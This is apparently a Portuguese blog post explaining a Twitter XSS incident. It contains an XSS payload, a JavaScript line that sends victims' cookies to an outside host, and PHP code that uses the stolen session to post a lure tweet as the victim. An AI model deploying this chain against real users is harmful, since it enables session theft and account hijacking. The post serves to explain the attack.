Como mais de 350 mil pessoas caíram na falha do Twitter

Mas o que é uma falha de XSS?

<input type=”hidden” name=”q” value=”meu texto” />
<input type=”hidden” name=”q” value=””/><script>alert(‘xss’)</script>”/>

Ainda sim estou confuso, o que isso tem a ver com o twitter?

window.location.href=”http://meusite.com/script.php?cookie=” + btoa(document.cookie);
<?php//Recebo o cookie passado pela URL através do XSS
$cookie = base64_decode($_GET['cookie']);
// Instancio a classe do curl através da função curl_init já para a URL de postagem do twitter
$ch = curl_init('http://twitter.com/post');
// Corpo da requisição com a mensagem que desejo twittar
$post = http_build_query([
'tweet' => 'PeLanza da banda Restart sofre acidente trágico | http://bit.ly/d5Pho8'
]);
// Algumas configurações enviadas no cabeçalho da requisição
curl_setopt_array($ch, [
CURLOPT_RETURNTRANSFER => true, // Ativa o retorno da transferência
CURLOPT_COOKIE => $cookie, //Cookie recebido
CURLOPT_POST => true, // Especifico que a requisição é POST
CURLOPT_POSTFIELDS => $post // Dados enviados por POST
]);
curl_exec($ch); //Envia a requisição para o twitter// Redireciona para meu twitter
header('Location: http://twitter.com/Joseph_Felix');

--

--

Ninguém é tão grande que não possa aprender, nem tão pequeno que não possa ensinar.

Love podcasts or audiobooks? Learn on the go with our new app.

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store